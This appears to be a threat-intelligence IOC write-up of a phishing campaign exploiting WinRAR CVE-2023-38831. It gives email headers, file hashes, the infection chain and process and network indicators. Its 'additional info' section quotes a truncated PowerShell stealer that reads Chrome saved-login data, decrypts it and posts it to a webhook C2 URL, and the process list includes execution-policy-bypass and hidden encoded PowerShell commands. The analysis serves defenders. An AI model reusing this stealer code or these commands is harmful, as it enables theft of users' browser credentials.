#rar_explot_300823

1. #IOC #OptiData #VR #RAR #202338831 #CMD #Powershell
2.  
3. https://pastebin.com/APaRNDHd
4.  
5. previous_contact:
6. n/a
7.  
8. FAQ:
9. https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/
10.  
11.  
12. attack_vector
13. --------------
14. email attach .RAR (exploit) > .xlsx .cmd > a.ps1 > powershell > exfil
15.  
16.  
17. # # # # # # # #
18. email_headers
19. # # # # # # # #
20. Return-Path: <management@abcosteel.com>
21. Received: from server.abcosteel.com (server.abcosteel.com [108.175.163.195])
22. Received: from [185.195.19.200] (port=44932 helo=[127.0.1.1]) by server.abcosteel.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.93)
23. From: cyber_alerts <management@abcosteel.com>
24. Subject: Нові індикатори кіберзагроз
25. Message-Id: <20230830131505.37UDF5QT031908@abcosteel.com>
26. Date: Wed, 30 Aug 2023 13:15:05 +0300
27.  
28.  
29. # # # # # # # #
30. files
31. # # # # # # # #
32. SHA-256 f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9
33. File name IOC_30_08.rar [ WinRAR CVE-2023-38831 ]
34. File size 13.71 KB (14044 bytes)
35.  
36. SHA-256 ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc
37. File name IOC_30_08.xlsx .cmd
38. File size 23.79 KB (24363 bytes)
39.  
40. SHA-256 363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648
41. File name a.ps1
42. File size 18.96 KB (19418 bytes)
43.  
44.  
45. # # # # # # # #
46. activity
47. # # # # # # # #
48. PL_SCR email_attach
49.  
50. C2 http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6
51.  
52.  
53. netwrk
54. --------------
55. 46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
56. 46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
57.  
58.  
59. comp
60. --------------
61. powershell.exe 46.4.105{ .116 80
62.  
63.  
64. proc
65. --------------
66. "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\operator\Desktop\IOC_30_08.rar"
67. C:\Windows\system32\cmd.exe /c ""C:\tmp\Rar$DIa948.23332\IOC_30_08.xlsx .cmd" "
68. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-ExecutionPolicy Unrestricted -scope CurrentUser; .\a.ps1
69. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
70. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe del .\a.ps1
71. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAc
72.  
73.  
74. persist
75. --------------
76. n/a
77.  
78.  
79. drop
80. --------------
81. %temp%\Rar$DIa948.23332\IOC_30_08.xlsx .cmd
82. %temp%\example.xlsx
83. C:\Users\%name%\Desktop\a.ps1
84. C:\Users\%name%\AppData\Roaming\Microsoft\Office\Последние файлы\example.xlsx.LNK
85.  
86.  
87. # # # # # # # #
88. additional info
89. # # # # # # # #
90. Add-Type -AssemblyName System.Text.Encoding; Add-Type -AssemblyName System.Security; $hook="http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6"; $dataPath="$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default\\Login Data"; $localStatePath = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Local State"; ....
91. :Unprotect($master_key_encoded[5..$master_key_encoded.length], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $loginDataContent = [convert]::ToBase64String((Get-Content -path $dataPath -Encoding byte)); $postParams = @{k
92.  
93.  
94. # # # # # # # #
95. VT & Intezer
96. # # # # # # # #
97. https://www.virustotal.com/gui/file/f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9/details
98. https://www.virustotal.com/gui/file/ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc/details
99. https://analyze.intezer.com/analyses/a3975e5f-16b9-4942-b68d-bbb12fde9003/genetic-analysis
100. https://www.virustotal.com/gui/file/363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648/details
101.  
102. VR